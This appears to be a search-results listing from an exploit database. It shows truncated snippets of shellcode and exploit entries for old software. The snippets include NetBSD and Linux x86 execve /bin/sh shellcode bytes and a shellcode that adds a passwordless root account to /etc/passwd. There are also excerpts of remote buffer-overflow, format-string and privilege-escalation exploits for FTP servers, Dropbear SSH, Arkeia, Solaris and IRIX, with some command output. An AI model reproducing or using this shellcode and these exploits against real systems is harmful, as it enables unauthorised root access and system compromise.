54 matches found
netbsd/x86 execve /bin/sh 68 bytes
netbsd/x86 execve /bin/sh 68 bytes. Shellcode exploit for netbsdx86 platform / NetBSD execve of /bin/sh by humble of Rhino9 / char shellcode = "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b" "\x31\xd2" "\x89\x56\x07" "\x89\x56\x0f" "\x89\x56\x14" "\x88\x56\x19" "\x31\xc0" "\xb0\x3b" "\x8d\x4e\x0b"...
netbsd/x86 execve /bin/sh 68 bytes
No description provided by source. / NetBSD execve of /bin/sh by humble of Rhino9 / char shellcode = "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b" "\x31\xd2" "\x89\x56\x07" "\x89\x56\x0f" "\x89\x56\x14" "\x88\x56\x19" "\x31\xc0" "\xb0\x3b" "\x8d\x4e\x0b" "\x89\xca" "\x52" "\x51" "\x53" "\x50"...
linux/x86 execve /bin/sh 38 bytes
linux/x86 execve /bin/sh 38 bytes. Shellcode exploit for linx86 platform / [email protected] execve /bin/sh main char name2; name0="/bin/sh"; name1=NULL; execvename0,name,NULL; / include char shellcode= "\xeb\x18" // jmp 0x18 // 3-4 "\x5e" // popl %esi // 5 "\x89\x76\x08" // movl %esi,...
BlackJumboDog FTP Server 3.6.1 - Remote Buffer Overflow
BlackJumboDog FTP Server 3.6.1 - Remote Buffer Overflow / 6.9.04|www.Delikon.de|Delikon BlackJumboDog FTP Server Buffer Overflow version 3.6.1 http://www.securiteam.com/windowsntfocus/5AP040ADPW.html Thx to Chew Keong TAN C:\Codes\blackjumbodog\Releasebjdexploit 192.168.0.3 21 klein.exe...
SquirrelMail - chpasswd Local Privilege Escalation (Brute Force)
SquirrelMail - chpasswd Local Privilege Escalation Brute Force / PSTchpasswdexp-vb.c: Squirrelmail chpasswd local root bruteforce exploit Author: Bytes || www ph4nt0m net Notice: vb: Local bruteforce version vR: remote bruteforce version Greatze: ph4nt0m,music@0x557 All PST...
Dropbear SSH 0.34 - Remote Code Execution
Dropbear SSH 0.34 - Remote Code Execution / Linux x86 Dropbear SSH quit Connection closed. % objdump -R /usr/local/sbin/dropbear| grep malloc 080673bc R386JUMPSLOT malloc % drop-root -v24 localhost ?.2022u%24$hn@localhost's password: Connection closed by 127.0.0.1 % telnet localhost 10275 Trying...
Serv-U FTPD 3.x/4.x/5.x (MDTM) Remote Overflow Exploit
Exploit for unknown platform in category remote exploits ====================================================== Serv-U FTPD 3.x/4.x/5.x MDTM Remote Overflow Exploit ====================================================== / exservu.c - Serv-U FTPD 3.x/4.x/5.x "MDTM" Command remote overflow exploit...
Solaris Runtime Linker (ld.so.1) Buffer Overflow Exploit (SPARC version)
Exploit for solaris platform in category local exploits ======================================================================== Solaris Runtime Linker ld.so.1 Buffer Overflow Exploit SPARC version ======================================================================== / ld.so.1 exploit SPARC...
Knox Arkeia Pro 5.1.12 - Backup Remote Code Execution
/ Knox Arkiea arkiead local/remote root exploit. Portbind 5074 shellcode Tested on Redhat 8.0, Redhat 7.2, but all versions are presumed vulnerable. NULLs out least significant byte of EBP to pull EIP out of overflow buffer. A previous request forces a large allocation of NOP's + shellcode in hea...
SRT2003-04-03-1300 - Interbase ISC_LOCK_ENV overflow
Secure Network Operations, Inc. http://www.secnetops.com Strategic Reconnaissance Team [email protected] Team Lead Contact [email protected] Our Mission: Secure Network Operations offers expertise in Networking, Intrusion Detection Systems IDS, Software Security Validation, and...
File 3.x - Utility Local Memory Allocation
// source: https://www.securityfocus.com/bid/7009/info It has been reported that a memory allocation issue exists the file program. Although details of this issue are currently unavailable, it is likely that this issue could be exploited to cause a denial of service condition, and potentially...
HP-UX FTPD - Remote Buffer Overflow
/ theoretical exploit for hpux ftpd vulnerability / / not tested anywhere, needs tweaking / / c 2000 by babcia padlina ltd. / include include define NOPS 100 define BUFSIZE 1024 char shellcode = / HP-UX shellcode / "\x34\x16\x05\x06\x96\xd6\x05\x34\x20\x20\x08\x01\xe4\x20\xe0\x08\x0b"...
linux/x86 add user 70 bytes
linux/x86 add user 70 bytes. Shellcode exploit for linx86 platform / Linux/x86 Appends the line "z::0:0:::\n" to /etc/passwd. quite old, could be optimized further / include char c0de = / main: / "\xeb\x29" / jmp callz / / start: / "\x5e" / popl %esi / "\x29\xc0" / subl %eax, %eax / "\x88\x46\x0b...
SGI IRIX - binlogin Local Buffer Overflow
SGI IRIX - binlogin Local Buffer Overflow / /bin/login exploit by DCRH 24/5/97 Tested on: R3000 Indigo Irix 5.3 R4400 Indy Irix 5.3 R5000 O2 Irix 6.3 R8000 Power Challenge Irix 6.2 Compile as: cc -n32 login.c for Irix 6.x cc login.c for Irix 5.x Press enter when prompted for a password / include...